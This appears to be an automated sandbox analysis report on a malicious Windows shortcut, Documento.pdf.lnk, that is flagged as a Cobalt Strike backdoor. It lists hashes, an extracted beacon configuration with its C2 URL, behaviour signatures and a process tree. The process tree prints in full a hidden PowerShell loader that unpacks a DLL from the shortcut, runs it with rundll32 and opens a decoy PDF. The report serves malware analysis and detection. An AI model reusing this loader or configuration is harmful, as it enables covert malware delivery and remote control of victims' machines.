Overview

overview

10

Static

static

1

Documento.pdf.lnk

windows10-1703-x64

10

Documento.pdf.lnk

windows7-x64

3

Documento.pdf.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    169s
  • max time network
    175s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-02-2023 15:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Documento.pdf.lnk

  • Size

    592KB

  • MD5

    2a26b3354a0daeb38079a62471ab5ba8

  • SHA1

    711a6790e2e50a949297d10c47e9fc3e8d2632fb

  • SHA256

    7cc53f1b2b4eac4e9acd5722cc179ba4094f3101ec7b9e3874755ea501fa4aa3

  • SHA512

    e5620f60dea102742f0fb0252a87647bc3ee4eaf304866f3d028f5b0868e3a2179a1a9f46b46faefd077de09348b25c962b8a41eecfb8768a56c9fb4c2aa21cb

  • SSDEEP

    12288:3HQSYtswIsMXhZEpUrvXVX1dPb7dnJGnpu8QjUDZUndu8kd:37RsMXhuePVFVJknpu8Qj68kd

Score
10/10
cobaltstrike391144938backdoortrojan

Malware Config

Extracted

Family

cobaltstrike

Botnet

391144938

C2

http://192.168.56.3:80/cr.css

Attributes
  • access_type

    512

  • host

    192.168.56.3,/cr.css

  • http_header1

    AAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAPQWNjZXB0OiBpbWFnZS8qAAAACgAAACVBY2NlcHQtTGFuZ3VhZ2U6IGVuLUdCO3E9MC45LCAqO3E9MC43AAAABwAAAAAAAAAPAAAAAwAAAAIAAAArd29yZHByZXNzX2VkMWY2MTdiYmQ2YzAwNGNjMDllMDQ2ZjNjMWI3MTQ4PQAAAAYAAAAGQ29va2llAAAACQAAAApkb2l0PWZhbHNlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_header2

    AAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAYQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluAAAABwAAAAEAAAAIAAAAAwAAAAQAAAAHAAAAAAAAAAMAAAACAAAADl9fc2Vzc2lvbl9faWQ9AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_method1

    GET

  • http_method2

    POST

  • jitter

    9984

  • polling_time

    63898

  • port_number

    80

  • sc_process32

    %windir%\syswow64\WUAUCLT.exe

  • sc_process64

    %windir%\sysnative\WUAUCLT.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCAP2p67B2EuiUUNi4YopVGqDxIAVr4kwkDbycHatN9jwkxSkTJT6iyeXzcJ7Sc+hNbrZLdRa6zzMJG0BELkNQ+l3WrPnS2ca8Bvc0OjwqomRe/Fzb+e8+Qnpq4ATCLY5idTtx/uPMX0AnpjFzp/Pqer/fND80DVh+xkh/c+43/XwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    3.010993152e+09

  • unknown2

    AAAABAAAAAIAAAbnAAAAAwAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • uri

    /av

  • user_agent

    Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0

  • watermark

    391144938

Signatures

  • Cobaltstrike

    Detected malicious payload which is part of Cobaltstrike.

    trojanbackdoorcobaltstrike
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Documento.pdf.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:548
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00607058} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = 'C:\Users\Admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[002456..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& rundll32.exe $obf_dir\bloated-pestilence.dll,runner; .\sample.pdf
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3744
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 00607058} | Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = 'C:\Users\Admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[002456..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force | Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force | Out-Null;& rundll32.exe $obf_dir\bloated-pestilence.dll,runner; .\sample.pdf
        3⤵
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4320
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\bloated-pestilence.dll,runner
          4⤵
          • Loads dropped DLL
          PID:216
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\sample.pdf"
          4⤵
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1716
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            5⤵
              PID:2240
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
              5⤵
                PID:2096

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\bloated-pestilence.dll
        Filesize

        200.5MB

        MD5

        a1fbc3b06df134b68e76476080c85bc4

        SHA1

        51dec4482eb41cd388c15a19d4cb1499ccb2235d

        SHA256

        6bcb22eb8e8e9f6844f31725610ee06fadcca3b4c6e8b738aafa12f6bbf34482

        SHA512

        1536f5761cc6421eb8d0387ef457358f8f7f4eab1822794c2496202ce71de0a5ef9bc45e07f17315714a79c7f58cb3576024ded4f1ebcb218b06b30484ebc45f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\bloated-pestilence.dll
        Filesize

        200.5MB

        MD5

        a1fbc3b06df134b68e76476080c85bc4

        SHA1

        51dec4482eb41cd388c15a19d4cb1499ccb2235d

        SHA256

        6bcb22eb8e8e9f6844f31725610ee06fadcca3b4c6e8b738aafa12f6bbf34482

        SHA512

        1536f5761cc6421eb8d0387ef457358f8f7f4eab1822794c2496202ce71de0a5ef9bc45e07f17315714a79c7f58cb3576024ded4f1ebcb218b06b30484ebc45f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\sample.pdf
        Filesize

        2KB

        MD5

        4b41a3475132bd861b30a878e30aa56a

        SHA1

        bfd009f500c057195ffde66fae64f92fa5f59b72

        SHA256

        8decc8571946d4cd70a024949e033a2a2a54377fe9f1c1b944c20f9ee11a9e51

        SHA512

        eaf7542ade2c338d8d2cc76fcbf883e62c31336e60cb236f86ed66c8154ea9fb836fd88367880911529bdafed0e76cd34272123a4d656db61b120b95eaa3e069

        Download Submit

      • memory/216-145-0x00000253FEC50000-0x00000253FECDA000-memory.dmp

        Filesize

        552KB

        Download

      • memory/216-139-0x0000000000000000-mapping.dmp

        Download

      • memory/1716-141-0x0000000000000000-mapping.dmp

        Download

      • memory/2096-147-0x0000000000000000-mapping.dmp

        Download

      • memory/2240-146-0x0000000000000000-mapping.dmp

        Download

      • memory/3744-132-0x0000000000000000-mapping.dmp

        Download

      • memory/4320-134-0x000001F55C390000-0x000001F55C3B2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4320-142-0x00007FFBADDB0000-0x00007FFBAE871000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4320-133-0x0000000000000000-mapping.dmp

        Download

      • memory/4320-135-0x00007FFBADDB0000-0x00007FFBAE871000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4320-138-0x000001F55C3D0000-0x000001F55C3DA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4320-137-0x000001F55C3E0000-0x000001F55C3F2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4320-136-0x00007FFBADDB0000-0x00007FFBAE871000-memory.dmp

        Filesize

        10.8MB

        Download